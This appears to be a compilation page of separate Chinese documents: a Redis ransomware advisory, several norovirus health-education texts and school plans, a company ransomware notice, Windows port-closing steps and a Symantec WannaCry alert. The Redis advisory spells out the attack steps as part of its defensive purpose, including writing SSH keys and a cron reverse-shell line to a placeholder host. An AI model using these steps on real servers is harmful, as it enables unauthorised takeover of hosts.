Redis勒索病毒预警(1)

Redis勒索病毒预警

一、Redis应用介绍及漏洞攻击手段

1.Redis应用介绍

Redis是key-value数据库，一般企业级使用场景为内部查询缓存。支持的value值包括string、list、set、zset和hash，为了保证效率，数据都是缓存在内存中，当然redis会周期性的把更新数据写入到磁盘或者吧修改操作写入追加的记录文件，并且在此基础上实现了master-slave同步。

2.攻击手段

·获取服务器开放端口信息

Nmap -A -p 6379 -script redis-info x.x.x.x

·安装redis的python访客包模拟client访问服务器

·如果密码不为空的情况下使用hydra暴力破解。

·写入SSH公钥，获得操作权限

·首先在C&C服务器上生成自己的公钥ssh-keygen -t rsa

·将公钥导入都C2key.txt文件

·通过修改数据库默认路径为root/.ssh和默认的缓冲文件authorized.keys把

缓冲数据写入到文件中，这样就可以生成一个授权的key。

Config set mypath /root/.ssh

Config set myname authorized.keys

·最重要的一点，搞完之后要隐藏攻击路径。恢复设置

·写入反弹shell

set yyy "\n\n* /1 /bin/bash -i>&/dev/tcp/x.x.x.x/5678 0>&1\n\n"

Config set mypath /var/spool/cron

Config set myname root

也可直接写入挖矿程序、webshell、勒索软件、DDoS攻击程序等攻击手段二、如何防范和应对Redis勒索病毒

【漏洞概述】

Redis 默认情况下，会绑定在0.0.0.0:6379，导致Redis服务暴露到公网上。

如果在没有开启认证并且在任意用户可以访问目标服务器的情况下，可以未授权访问Redis服务，进一步可进行数据增删改查，甚至获取服务器权限等恶意操作。

【风险等级】

高风险

【漏洞风险】

主机被远程控制，泄漏敏感业务数据；

【漏洞利用条件】

1.Redis服务以root账户运行；

2.Redis无密码或弱密码进行认证；

3. Redis监听在0.0.0.0公网上；

【加固建议】

1. 禁止Redis服务对公网开放，可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ，去掉前面的"#"即可（Redis本来就是作为内存数据库，只要监听在本机即可）；

2. 设置密码访问认证，可通过修改redis.conf配置文件中的"requirepass" 设置复杂密码（需要重启Redis服务才能生效）；

3. 对访问源IP进行访问控制，可在防火墙限定指定源ip才可以连接Redis服务器；

3.修改Redis默认端口，将默认的6379端口修改为其他端口；

4.禁用config指令避免恶意操作，在Redis配置文件redis.conf中配置

rename-command项"RENAME_CONFIG"，这样即使存在未授权访问，也能够给攻击者使用config 指令加大难度；

5.Redis使用普通用户权限，禁止使用root 权限启动Redis 服务，这样可以

保证在存在漏洞的情况下攻击者也只能获取到普通用户权限，无法获取root 权限；

6.定期关注最新软件版本，并及时升级Redis 到最新版，防止新漏洞被恶意利

用。

【清理木马】

1. 阻断服务器通讯。

(如iptables -A INPUT -sxmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -jDROP)

2. 清除定时器任务。

(如systemctl stop crond 或者crontab –e 删除未知的计划任务)

3. 删除木马和未知公钥文件。

(如/tmp/Circle_MI.png, /opt/minerd, /root/.mcfg,/root/.daemond,

/tmp/kworker34, /root/.httpd等及~/.ssh/中未知授权；chmod –x 恶意程序)

4. 终止木马进程。

(如pkill minerd,pkill/root/.mcfg, pkill /tmp/kworker34, pkill /root/.daemond, pkill /tmp/kworker34, pkill /root/.httpd)

5. 终止恶意service

(查看是否有恶意的服务，如lady - service ladystop)

诺如病毒防治知识宣传

诺如病毒防治知识宣传 一、概述 诺如病毒感染性腹泻是由诺如病毒属病毒引起的腹泻，具有发病急、传播速度快、涉及范围广等特点，是引起非细菌性腹泻暴发的主要病因。诺如病毒感染性强，以肠道传播为主，可通过污染的水源、食物、物品、空气等传播，常在社区、学校、餐馆、医院、托儿所、孤老院及军队等处引起集体暴发。 诺如病毒感染性腹泻在全世界范围内均有流行，全年均可发生感染，感染对象主要是成人和学龄儿童，寒冷季节呈现高发。 二、临床症状 诺如病毒感染主要引起胃肠炎，具有发病急、传播速度快、涉 及范围广等特点。胃肠炎的症状是恶心、呕吐、腹泻等，部分人主诉有头痛、发热、寒战、肌肉疼痛。症状通常持续1-2天。普遍感到病情严重，一日多次剧烈呕吐。症状一般摄入病毒后24-48小时出现, 但是暴露后12小时也可能出现症状。没有证据表明感染者能成为长期病毒携带者，但是从发病到康复后2周感染者的粪便和呕吐物中可以检出病毒。 三、传播途径 诺如病毒主要经消化道传播，传染性强。感染者粪便和呕吐物中 可以发现诺如病毒，可以通过几种方式感染诺如病毒： 食用诺如病毒污染的食物或饮用诺如病毒污染的饮料;

接触诺如病毒污染的物体或表面，然后手接触到口； 直接接触到感染者（如照顾病人，与病人同餐或使用相同的餐具）。 食物和饮料很容易被诺如病毒污染，因为病毒很小，而且摄入不到100个病毒就能使人发病。食物可以被污染的手、呕吐物或粪便污染的物体表面直接污染，或者通过附近呕吐物细小飞沫污染。尽管病毒在人体外很难繁殖，但是一旦存在食品或水中，就能引起疾病。 有些食品在送至饭店或商店前可能被污染。一些暴发是由于食用从污染的水中捕获的牡蛎。其它产品如色拉和冰冻水果也可能在来源地被污染。 四、治疗方法 诺如病毒引起的感染尚无特殊的治疗手段，以对症治疗为主，病 程一般为2~3天，恢复后无后遗症。然而不能喝足够多水来补充呕吐、腹泻丢失的水分，可能出现脱水，需要特殊的医学观察的人包括儿童、年老者和不能自理的所有年龄段人。 五、预防措施 预防诺如病毒感染性腹泻的关键是把好病从口入”这一关，要注意饮食和饮水卫生，养成良好的卫生习惯。 1、保护环境卫生。不乱扔垃圾，不随地大小便，对病人的呕吐物及粪便要及时消毒处理，确保周围环境的清洁；被污染衣物应该用肥皂水彻底清洗； 2、注意饮食卫生，以免病从口入” A、不吃不洁净的食物、不购买街边小店的零食，如：烧烤、串串香、凉

预防诺如病毒知识.doc

预防诺如病毒 学校卫生知识普及宣传稿 近期，北京和深圳都发生了诺如病毒疫情，我市疾控中心提醒：目前，正值诺如病毒感染高发季，市民要注意个人卫生，如发现儿童、学生出现聚集性恶心、呕吐、腹泻等症状，要及时就诊并居家隔离治疗，以下知识大家一定要弄懂！ 诺如病毒虽然听起来名字有点唬人，但其实它是一种常见病毒，并不是一种新型病毒。感染后 48 小时内，患者会出现呕吐、腹泻等急性胃肠炎症状，以呕吐症状更多见。冬季又是诺如病毒暴发流行的高发季节，所以诺如病毒感染性腹泻也被称为“冬季呕吐病”。 传播途径：诺如病毒感染性强，通过粪-口途径传播，可通过污染的水源、食物、物品、空气等传播，常在社区、学校、餐馆、医院、托儿所、养老院及军队等处引起集体爆发。 感染原因主要有： 1、食用或饮用诺如病毒污染的食物、水或饮料； 2、接触诺如病毒污染的物体或表面，然后手接触到口； 3、直接接触感染者，如照顾病人、与病人共餐或使用相同的餐具等。 感染性极强： 这是一种感染性极强的病毒，只需要 10 - 100 个病毒粒子就可以致病。要知道，一次呕吐就可以排出数以亿计的病毒粒子。病毒通过气溶胶在空气中弥散，造成聚集性的疫情暴发。如果家中有人感染了诺如病毒，呕吐或腹泻后，记得按照正确的方法及时对被污染的家具、地板和衣服进行消毒——先洒上比如”84”这样含氯的消毒剂，呕吐物最好用消毒粉覆盖30分钟后，再清理。这时候，医用酒精可是无效的。 抗生素无效： 感染诺如病毒之后，是没有特效药物的。感染诺如病毒之后，会腹泻和呕吐，有时候我们会自行服用抗生素，这是错误的方法，抗生素对诺如病毒是无效的，只会造成抗生素的滥用。 好在它是一种自愈性的疾病，和感冒一样。只需要进行对症治疗即可，如果发烧就退烧，腹泻就止泻。值得注意的是，症状消失后的 3 天以内，身上携带的病毒仍然具有强传播力。所以，痊愈后的 3 天，最好不要去人群聚集的地方，以免造成病毒的再次传播。

关于做好勒索病毒防范工作的紧急通知

关于做好新型计算机勒索病毒防范工作的紧急通知 全体员工： 由于本次新冠疫情的全球化扩散，导致目前全球各国经济处于增长放缓或停滞衰退的状态。大量企业倒闭，员工失业，由此也催生了勒索病毒相关黑产群体的进一步扩大。 近期，新型勒索病毒大肆传播。最近半个月，仅张家港本地，已发生多起中毒事件。由于无法解密，感染用户只能通过缴纳赎金的方式恢复数据。相关监测显示目前该类型病毒主要通过电子邮件、远程暴力破解、扫描特定的网络服务端口、同时也会通过各种计算机软件漏洞和用户不安全使用计算机和网络的行为进行入侵和传播。为了做好安全防范工作，请全体员工高度重视，做好以下防范措施： 一、及时安装防病毒软件，落实安全防护措施。 公司采购有企业正版杀毒安全软件《火绒安全软件》，各位计算机使用者如发现自己计算机未有安装，请立即与IT管理员联系。 二、加强密码强度，下班及时关闭计算机。 1、计算机登录密码应设置强密码（8位以上,包含大小写字母、数字及特殊字符）； 2、必须使用远程登录应用协议的计算机、服务器在设置强密码的同时，还应开启 二次动态口令验证。 3、由于大多数攻击发生在半夜，因此各位员工下班前一定要关闭计算机！ 三、强化安全意识，抵制诱惑，规范行为。 各用户要提高用户安全意识，不要点击不明链接，不要下载/打开/安装不明文件，不要点击/打开不明邮件，不要浏览非法网站。 四、及时做好工作资料的备份工作。 各用户应每天/每周将工作资料上传至PLM、文件服务器进行备份和归档工作。 五、疑似中毒的紧急处理办法。 发现计算机异常，应立即断开网络并关机，切勿重启。报IT管理员进行处理。 附则： 一、本通知由行政人事部发布，行政人事部负责解释。 二、请各位员工务必重视，如因个人未遵守管理而造成后续相关损失的，需承担相应 的责任与赔偿。 三、如有任何疑问及事件支持，请联系IT管理员 行政人事部 2020年3月28日

卫生知识诺如病毒讲座教案资料

卫生知识诺如病毒讲 座

泽远小学学生卫生知识讲座 时间：2016年12月14日 地点：学校操场 主讲：李杰 主题：《诺如病毒防治科普小常识》 诺如病毒防治科普小常识 近日来，一则“上海某小学54名学生、2名教师感染诺如病毒”的新闻引起了社会各界关注，为了让同学们更好的了解诺如病毒及其危害，正确应对病毒感染引起的症状，今天我们一起学习诺如病毒防控相关知识： 1.什么是诺如病毒？在什么季节流行？ 诺如病毒是一种能够引起急性胃肠炎的病毒。与通常引起胃肠炎的细菌不同，诺如病毒的变异较快，是一组形态相似而抗原性略有不同的病毒颗粒。同一时期和同一社区内可能存在遗传特性不同的病毒在流行，也就是说诺如病毒从来不是“一个人在战斗”。人体的免疫系统一时无法有效应对，因此病毒容易反复感染。诺如病毒感染全年均有发生，通常秋冬季节为高发期，具有发病急、传播速度快、涉及范围广等特点。 2.诺如病毒容易感染哪些人群？是怎样传播的？ 诺如病毒常在人口密度较高和卫生环境较差的地方暴发流行，儿童、老人和免疫力低下的人群容易感染，其中儿童感染和发病率较高。病毒主

要经过粪口途径传播，也就是食入了病毒而感染，常见的传播方法主要有： ①食入诺如病毒污染的食物或饮水，食物或饮水可能通过与被污染的手、被呕吐物或粪便污染的物体接触而沾染病毒。 ②接触到被诺如病毒污染的物体，然后经手传播到口。 ③通过摄入呕吐物细小飞沫而感染。 3.患病后有什么表现？ 诺如病毒感染后潜伏期多在24-48小时，最短12小时，最长72小时。感染者发病突然，主要症状为恶心、呕吐、发热、腹痛和腹泻。儿童患者普遍出现呕吐症状，成人患者以腹泻为主，24小时内腹泻4到8次，粪便为稀水便或水样便，无粘液脓血。原发感染患者的呕吐症状明显多于续发感染者，有些感染者仅表现出呕吐症状。此外，也可见头痛、寒颤和肌肉痛等症状，严重者可出现脱水症状。 4.一旦出现可疑症状怎么办？有疫苗或药物吗？ 一旦儿童出现发热、呕吐和腹泻等疑似感染症状，应及时到医疗机构就诊，并密切观察。避免去幼儿园、游乐场等人群聚集的公共场所，避免与其他孩子接触。诺如病毒感染一般预后良好，以对症或支持治疗为主，不需使用抗生素，严重病例尤其是幼儿及体弱者应及时就诊输液或口服补液，以纠正脱水、酸中毒及电解质紊乱。目前，针对诺如病毒尚无特效的抗病毒药物或疫苗。 5.如果家里有儿童患病应该特别注意什么？

勒索病毒防范方法

勒索病毒防范方法 一、系统补丁更新 从官方下载适配自己电脑操作系统的MS17-010补丁～本压缩包中也会包含。在安装补丁过程中出现“此更新无法适配本系统”问题时～因为电脑操作系统未更新到SP3～请下载sp3补丁将操作系统更新到SP3～然后再更新MS17-010补丁。 二、端口关闭 1、关闭 445、135、137、138、139 端口～关闭网络共享也可以避免中招。方法如下: ,1,运行输入“dcomcnfg” ,2,在“计算机”选项右边～右键单击“我的电脑”～选择“属性”。 ,3,在出现的“我的电脑属性”对话框“默认属性”选项卡中～去掉“在此计算机上启用分布式COM”前的勾。 ,4,选择“默认协议”选项卡～选中“面向连接的TCP/IP”～单击“删除”按钮 2、关闭 135、137、138 端口 在网络邻居上点右键选属性～在新建好的连接上点右键选属性再选择网络选项卡～去掉 Microsoft 网络的文件和打印机共享～和 Microsoft 网络客户端的复选框。这样就关闭了共享端 135 和 137 还有 138端口 3、关闭 139 端口 139 端口是 NetBIOS Session 端口～用来文件和打印共享。关闭 139 的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性～进入“高级 TCP/IP 设置”“WINS设置”里面有一项“禁用 TCP/IP的NETBIOS ”～打勾就可关闭 139 端口。

4、关闭 445 端口 ,1,注册表关闭。开始-运行输入 regedit. 确定后定位到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\ NetBT\Parameters～新建名为“SMBDeviceEnabled”的DWORD值～并将其设置为 0～则可关闭 445 端口。 ,2,关闭Server服务。检查系统是否开启Server服务: 按“WIN+R”键～打开运行窗口, 输入”services.msc”～回车, 查找service～查看service服务状态～如果开启～请右击属性选择关闭。 ,3,手动关闭445端口。打开开始按钮～点击运行～输入cmd～点击确定,输入命令:netstat -an 回车,查看结果中是否还有445端口,依次输入下面命令:net stop rdr 回车,net stop srv 回车,net stop netbt 回车,再次输入 netstat -ano～成功关闭 445 端口。如果还不有445显示～需要重启电脑就好了。 ,4,配置主机级 ACL 策略封堵 445 端口。通过组策略 IP 安全策略限制Windows 网络共享协议相关端口 开始菜单->运行，输入 gpedit.msc 回车。打开组策略编辑器 在组策略编辑器中，计算机配置->windows 设置->安全设置->ip 安全策略下，在编辑器右边空白处鼠标右键单击，选择“创建IP 安全策略”

诺如病毒预防小常识

For personal use only in study and research; not for commercial use 诺如病毒预防小常识 诺如病毒（英语：Norovirus，NV），又称为诺罗病毒、诺沃克病毒或脓融病毒，是一种引起非细菌性急性胃肠炎的病毒。感染诺如病毒后最常见的症状是腹泻、呕吐、恶心，或伴有发热、头痛等症状。儿童患者呕吐、恶心多见，成人患者以腹泻为多，呕吐少见。病程一般为2-3 天，此病是一种自限性疾病，恢复后无后遗症。冬春开学季，也是学校诺如病毒爆发疫情的危险期。 对个人要求： （1）保持良好的饮食习惯。不要吃没熟的食物（如海鲜、沙拉类），不吃变质、不洁、生冷、生腌食物，食物需要至少煮沸15～20 分钟后才可放心食用。 （2）养成良好的个人卫生习惯。坚持勤洗手、勤剪指甲。进食或处理食物前，应用肥皂及清水洗净双手。如厕或处理呕吐物及粪便后须彻底洗净双手。 （3）及时就医。出现呕吐、腹泻等胃肠症状时，应尽早到各医院的肠道门诊就诊，不要跟亲朋好友接触。不去人群密集的公共场所，减少传染的机会。 对学校要求： （1）加强健康教育。学校开展多种形式的健康宣教，普及诺如病毒感染胃肠炎防治知识。 （2）加强消毒和通风。每日对教室、卫生间、楼道、门把手等公共场所和用品用具进行消毒，对呕吐物及时清除消毒。搞好环境卫生，保持教室和活动室通风。 （3）加强食品卫生和饮用水管理。工作人员要注意个人卫生，防止带病上岗，加工食物时防止生熟不分和交叉污染。桶装水应符合相关卫生标准，饮水机加强清洗消毒。 （4）加强个人防护。遇有学生在教室等公共场所呕吐，老师要及时疏散周边学生，及时清理消毒呕吐物，处理呕吐物时要注意个人防护，防止感染。 （5）加强风险沟通。与学生家长保持沟通，做好解释工作，防止造成不必

诺如病毒感染宣传教育知识

诺如病毒感染宣传教育知识 诺如病毒是急性肠胃炎最常见的病原体，该病毒基因多样且高度变异，每隔数年就会出现新变异株，人一生中可多次获得感染。诺如病毒感染通常表现为自限性疾病，预后良好。 临床特征： 最常见的症状是腹泻、呕吐、反胃、恶心和胃痛，其他包括发热、头痛和全身酸痛等。多数患者发病后1-3天即可康复。如频繁呕吐或腹泻，可导致脱水，弓I起严重的健康问题，尤其常见于幼小儿童、老年人和基础性疾病患者。脱水主要表现为少尿、口干、咽干、站立时感头晕目眩，在儿童中可表现为啼哭无泪或少泪、异常瞌睡或烦躁。 传播： 诺如病毒传染性强，所有人群均易感。病人发病前至康复后2周，均可在粪便中检到诺如病毒，但患病期和康复后三天内是传染性最强的时期。通常通过以下途径获得感染： ⑴食用或饮用被诺如病毒污染的食物或水； ⑵触摸被诺如病毒污染的物体或表面，然后将手指放入口 中； ⑶接触过诺如病毒感染患者，如照顾患者、与患者分享食物或共用餐具。

诺如病毒在密闭场所中（如托幼机构、幼儿园、学校、养老院、游船等）传播速度快，易引起暴发。 治疗： 尚无特异的抗病毒药物。患者应补充足够的水分以预防脱 水。轻度脱水时，运动饮料或其他饮品（不含咖啡因或酒精）可起到一定的补水效果，但不能补充重要的营养成分和矿物质，因此，在药店购买口服补水溶液是最有效的治疗方法。严重脱水时应及时住院输液治疗。 预防： ⑴注意洗手卫生，用肥皂和清水认真洗手，尤其在如厕和更换尿布后，以及每次进食、准备和加工食物前。 ⑵水果和蔬菜食用前应认真清洗，牡蛎和其他贝类海产品应深度加工后食用。诺如病毒抵抗力较强，在60C高温或经快速汽蒸仍可存活。 ⑶诺如病毒感染儿童应远离厨房或食物加工场所。 ⑷诺如病毒感染病人患病期至康复后3天内不能准备加工 食物或为其他患者陪护。 ⑸及时用含氯漂白剂或其他有效消毒剂清洗消毒被患者呕 吐物或粪便污染的表面，立即脱掉和清洗被污染的衣物或床单等，清洗时应戴上橡胶或一次性手套，并在清洗后认真洗手。（中国疾

企业防勒索病毒安全解决方案

企业防勒索病毒安全解决方案 一、方案应用背景 勒索病毒是指：黑客通过锁屏、加密文件等方式劫持用户文件数据，并敲诈用户钱财的恶意软件，利用恶意代码干扰中毒者的正常使用，只有交钱才能恢复正常。自2017年5月WannaCry勒索病毒爆发以来，在短时间内大范围传播，给企业、高校、医院机构、公共基础设施造成了严重后果。硅谷网络风险建模公司Cyence的首席技术长George Ng称，仅“永恒之蓝”网络攻击造成的全球电脑死机直接成本总计约80亿美元。中国是勒索病毒攻击受害最为严重的国家之一，WannaCry勒索病毒爆发时仅一天时间，国内有近3W机构被攻击，覆盖至全国各地，其中教育、医疗、大型企业是国内被攻击最为严重的三大行业。 时隔一年后的2018年，勒索病毒威胁犹存。据相关机构统计，Globelmposter、Crysis、GandCrab、Satan是2018年上半年最为活跃的四大勒索病毒家族，传播量占到上半年勒索病毒传播总量的90%以上。今年七月，针对Windows 服务器的勒索病毒“撒旦”开始对大批企业服务器发起攻击，病毒会将计算机中的数据库文件进行加密，同时还具备二次传播能力，有可能入侵局域网内的其他机器。专家预测，由于利润丰厚、追踪困难等原因，未来各种勒索软件的攻击将会更为频繁，杀伤力也更大。

二、方案应对方法 针对持续爆发的勒索病毒，应当通过构建起从事前到事后全周期、全方位的安全防护体系，帮助各企事业单位及国家关键信息基础设施部门抵御勒索病毒的侵害。 在事前，从传播、加密、扩散三条路径对勒索病毒进行监测，并从网络异常、入侵、多引擎病毒、威胁变种基因等多方面进行分析检测，对未知威胁，采用沙箱检测方式，检测涵盖已知未知高级威胁，检测结果以预警方式发布，建立未知威胁预警体系。 勒索病毒有以下传播方式: 1、通过邮件附件进行传播； 2、通过钓鱼邮件进行群发下载URL传播； 3、企业用户在恶意站点下载病毒文件进行传播；

诺如病毒感染-预防诺如病毒主题班会

诺如病毒感染-预防诺如病毒主题班 会 预防诺如病毒感染性腹泻知识诺如病毒诺如病毒侵袭广州大学城三月以来200学生腹泻 预防诺如病毒感染性腹泻知识 诺如病毒是一组杯状病毒属的病毒，诺如病毒感染影响胃和肠道，容易引起胃肠炎。诺如病毒感染性腹泻是由诺如病毒属病毒引起的腹泻，具有发病急、传播速度快、涉及范围广等特点，是引起非细菌性腹泻暴发的主要病因。诺如病毒感染性强，以肠道传播为主，可通过污染的水源、食物、物品、空气等传播，常在社区、学校、餐馆、医院、托儿所、孤老院及军队等处引起集体暴

发。感染于冬季较常见。症状 潜伏期多在24-48小时，最短12小时，最长72小时，感染者发病突然，主要症状为恶心、呕吐、发热、腹痛、腹泻。儿童患者呕吐普遍，成人患者腹泻为多。此外，也可见头痛、寒战、肌肉疼痛，严重者可出现脱水症状。 传播途径 这种感染可通过下列途径传播： ——食用或饮用受病毒污染的食物或饮料； ——接触患者的呕吐物或粪便； ——接触病毒污染的物体或表面，然后手接触到口； ——直接接触到感染者(如照顾病人，与病人同餐或使用相同的餐具)。 食物和饮料很容易被诺如病毒污染，因为病毒很小，而且摄入不到100个病毒就能使人发病。食物可以被污染的手、呕吐物或粪便污染的物体表面直接污染，或者通过附近呕吐物细小飞沫污染。尽管病毒在人体外很难繁殖，但

是一旦存在食品或水中，就能引起疾病。 治疗 目前尚无特效的抗病毒药物，患者主要补充足够水份，以对症或支持治疗为主，一般可于一至三天内自行痊愈。一般不需使用抗菌素，预后良好。脱水是诺如病毒感染性腹泻的主要死因，对严重病例尤其是幼儿及体弱者应及时输液或口服补液，以纠正脱水、酸中毒及电解质紊乱。 预防方法 ——维持良好的个人、食物及环境卫生。 ——处理食物或进食前、如厕后要洗手。 ——所有食物应彻底煮熟才食用 ——食品加工人员和护理人员如有呕吐或腹泻现象，切勿上班，并应到医院诊治。 ——清理或处理呕吐物及粪便时要戴上手套及口罩，事后必须彻底洗手。 ——被服及物件表面若被污染，应

诺如病毒知识及预防

病毒简介 显微镜下的诺如病毒诺如病毒感染性腹泻是由诺如病毒属病毒引起的腹泻，具有发病急、传播速度快、涉及范围广等特点，是引起非细菌性腹泻暴发的主要病因。诺如病毒感染性强，以肠道传播为主，可通过污染的水源、食物、物品、空气等传播，常在社区、学校、餐馆、医院、托儿所、孤老院及军队等处引起集体暴发。 传播途径 诺如病毒感染性强，以肠道传播为主，可通过污染的水源、食物、物品、空气等传播，常在社区、学校、餐馆、医院、托儿所、孤老院及军队等处引起集体暴发。疾控专家称，病程为自限性，一般2～3天即可恢复。 诺如病毒的各种传播途径，如牲畜等感染者粪便和呕吐物中可以发现诺如病毒，可以通过几种方式感染诺如病毒： 1、食用诺如病毒污染的食物或饮用诺如病毒污染的饮料；因为病毒很小，而且摄入不到100个病毒就能使人发病。接触诺如病毒污染的物体或表面，然后手接触到口。 2、直接接触感染者，如照顾病人、与病人共餐或使用相同的餐具也可引起传播。直接接触到感染者(如照顾病人，与病人同餐或使用相同的餐具)。 3、食物可以被污染的手、呕吐物或粪便污染的物体表面直接污染，或者通过附近呕吐物细小飞沫污染。尽管病毒在人体外很难繁殖，但是一旦存在食品或水中，就能引起疾病。 4、有些食品在送至饭店或商店前可能被污染。一些暴发是由于食用从污染的水中捕获的牡蛎。其它产品如色拉和冰冻水果也可能在来源地被污染。 临床表现 潜伏期多在24～48h，最短12h，最长72h。感染者发病突然，主要症状为恶心、呕吐、发热、腹痛和腹泻。儿童患者呕吐普遍，成人患者腹泻为多，24h内腹泻4～8次，粪便为稀水便或水样便，无粘液脓血。大便常规镜检WBC<15，未见RBC。原发感染患者的呕吐症状明显多于续发感染者，有些感染者仅表现出呕吐症状。此外，也可见头痛、寒颤和肌肉痛等症状，严重者可出现脱水症状。 诺如病毒会引起胃肠道感染。主要症状为恶心、呕吐、腹部痉挛性腹泻，通常持续1-2天，一般在感染病毒后12-48小时出现症状。

Symantec-WannaCry勒索病毒预警

发生什么情况？ 2017年5月12日，一种新的已比特币赎金的方式。勒索病毒“Ransom.CryptXXX (WannaCry)开始广泛传播，影响了大量的企业用户，特别是在欧洲。 WannaCry 是什么样勒索？ WannaCry 用已加密数据文件，并要求用户支付$300赎金比特币。赎金明确说明指出，支付金额将三天后增加一倍。如果付款在七天后，加密的文件将被删除。 勒索信息截图（中文） 勒索信息截图（英文） 同时下载一个文件为“!Plesae Read Me!.txt”其中文本解释发生了什么，以及如何支付赎金

同时WannaCry加密文件具有以下扩展名，并将.WCRY到添加到文件名的结尾： ?.lay6 ?.sqlite3 ?.sqlitedb ?.accdb ?.java ?.class ?.mpeg ?.djvu ?.tiff ?.backup ?.vmdk ?.sldm ?.sldx ?.potm ?.potx ?.ppam ?.ppsx ?.ppsm ?.pptm ?.xltm ?.xltx ?.xlsb ?.xlsm ?.dotx ?.dotm ?.docm ?.docb ?.jpeg ?.onetoc2 ?.vsdx ?.pptx ?.xlsx ?.docx 此勒索软件的传播是利用微软已知SMBv2中的远程代码执行漏洞：MS17-010

使用Symantec防护软件否得到保护，免受威胁？ 使用了赛门铁克和诺顿的客户已经检测WannaCry并实施有效的保护。以下检测病毒和漏洞 n病毒 l Ransom.CryptXXX l Trojan.Gen.8!Cloud l Trojan.Gen.2 l Ransom.Wannacry n入侵防御系统 l21179（OS攻击：的Microsoft Windows SMB远程执行代码3） l23737（攻击：下载的Shellcode活动） l30018（OS攻击：MSRPC远程管理接口绑定） l23624（OS攻击：的Microsoft Windows SMB远程执行代码2） l23862（OS攻击：的Microsoft Windows SMB远程执行代码） l30010（OS攻击：的Microsoft Windows SMB RCE CVE-2017-0144） l22534（系统感染：恶意下载活动9） l23875（OS攻击：微软SMB MS17-010披露尝试） l29064（系统感染：Ransom.Ransom32活动） 企业用户应确保安装了最新的Windows安全更新程序，尤其是MS17-010，以防止其扩散。 谁受到影响？ 全球有许多组织受到影响，其中大多数在欧洲。

三(1)预防诺如病毒主题班会教案

如何预防诺如病毒主题班会教案 教学内容：小学生预防诺如病毒主题教育班会 教学目标：1、通过教育活动，使学生了解诺如病毒,使学生了解诺如病毒的历 史报告，珍惜生命增强；2、从使学生了解并掌握如何预防诺如病毒。 教学过程： 一、故事导入 《我好难受》：小狗毛毛在外面玩得满头大汗，一回到家就拿杯子接自来水喝。狗妈妈说：“毛毛不能喝自来水，你想喝就喝开水啊！”毛毛根本不听妈妈的话，继续喝着自来水。妈妈说：“你等会儿就知道了。”果然一会儿毛毛就不 舒服了，它肚子疼还吐了。妈妈马上带它到山羊医生那儿去看病。山羊医生看 完后问毛毛：“毛毛你是不是喝了不干净的水？”毛毛低下头轻轻地说：“是的”山羊医生说：“怪不得，自来水里不干净，里面有一种叫诺如病毒，如果 诺如病毒到了你的肚子里，那你就要生病了呀！”听了山羊医生的话，毛毛表 示以后再也不喝不干净的水了，要喝就喝开水。 提问：1.故事中的小狗毛毛怎么了？ 2.毛毛为什么会生病？ 师小结：小狗毛毛喝了不干净的水所以生病了。诺如病毒最喜欢呆在不干净的 水里，所以以后我们可不要像毛毛那样。 二、谈话：了解诺如病毒是怎么回事 1、讨论引出 ——我们现在喝水为什么要自己带水呢？ ——原来这是因为水里可能会有另一种细菌，它的名字叫诺如。 2、了解症状 ——出示图片这个小朋友心情怎么样？ ——诺如病毒悄悄的跑到了他身体里，他很难受（拉肚子，发烧等） 3、诺如的预防 ——诺如真危险，那我们怎么样才能不让它到我们身体里面呢？ ——出示图片讲述：喝开水、经常洗手、不到人多的地方、经常消毒、不小心

生病要及时去医院。 三、了解诺如病毒 诺如病毒感染性腹泻是由诺如病毒属病毒引起的腹泻，具有发病急、传播速度快、涉及范围广等特点，是引起非细菌性腹泻暴发的主要病因。诺如病毒感染性强，以肠道传播为主，可通过污染的水源、食物、物品、空气等传播，常在社区、学校、餐馆、医院、托儿所、孤老院及军队等处引起集体暴发。 诺如病毒遗传高度变异，在同一时期和同一社区内可能存在遗传特性不同的毒株流行。诺如病毒抗体没有显著的保护作用，尤其是没有长期免疫保护作用，极易造成反复感染。 治疗方法：目前尚无特效的抗病毒药物，以对症或支持治疗为主，一般不需使用抗菌素，预后良好。脱水是诺如病毒感染性腹泻的主要死因，对严重病例尤其是幼儿及体弱者应及时输液或口服补液，以纠正脱水、酸中毒及电解质紊乱。 传播途径：感染者粪便和呕吐物中可以发现诺如病毒，可以通过几种方式感染诺如病毒：食用诺如病毒污染的食物或饮用诺如病毒污染的饮料；接触诺如病毒污染的物体或表面，然后手接触到口； 直接接触到感染者(如照顾病人，与病人同餐或使用相同的餐具)。 食物和饮料很容易被诺如病毒污染，因为病毒很小，而且摄入不到100个病毒就能使人发病。食物可以被污染的手、呕吐物或粪便污染的物体表面直接污染，或者通过附近呕吐物细小飞沫污染。尽管病毒在人体外很难繁殖，但是一旦存在食品或水中，就能引起疾病。 [3] 有些食品在送至饭店或商店前可能被污染。一些暴发是由于食用从污染的水中捕获的牡蛎。其它产品如色拉和冰冻水果也可能在来源地被污染。 四、预防措施 由于诺如病毒感染病是一种常见的肠道传染病，容易在人群密集的场所发生局部聚集病例。因而我们应共同做好预防工作。

学校诺如病毒防控方案

学校诺如病毒防控方案 学校诺如病毒防控方案篇一 为提高我校预防和控制传染病能力,减轻、消除传染病的危害,科学有效地做好诺如病毒防控工作,提高应对诺如病毒的能力,保障全校师生的身体健康与生命安全,维护学校正常的教学秩序,特制定本方案。 一、成立诺如病毒防控工作领导小组 组长: 副组长: 成员: 报告联络人: 二、具体防控措施 （一）加强校园环境卫生,保持室内空气流通。（责任人:） 每天放学后对全校进行消毒,早上教室、寝室等开窗通风,以保持室内空气清新。用清水擦干净桌面、柜子等,严禁乱堆放物品,收拾整理室内外环境,进行湿性扫除。 （二）加强晨检、午检、因病缺勤病因追踪与登记工作。（责任人:） 严格执行晨午检制度、因病缺勤病因追查与登记制度。每天由班主任进行晨检工作,若发现有呕吐,腹泻等疑似病例应立即通知家长带回到医院诊治,及时报告校园传染病疫情报告人,学校按照规定向卫生、教育部门报告,确保做到早发现、早报告、早诊断、早隔离、早治疗。班主任要做好因病缺勤学生的电话追踪（了解具体情况）及登记工作,每天将缺勤情况反馈到政教处（有、无请假情况都要上报）,并将检查结果如实记录到纸质登记表。通过微信等平台给全体家长发温馨提示,提醒家长每天上学前监测学生体温,如有呕吐、腹泻等不适及时到正规医院就诊,病情完全控制三天后方可返校,返校必须带医院开具的疾病诊断书证明痊愈后,才可以进班。 （三）加强物质配备,保证师生身体健康。（责任人:） 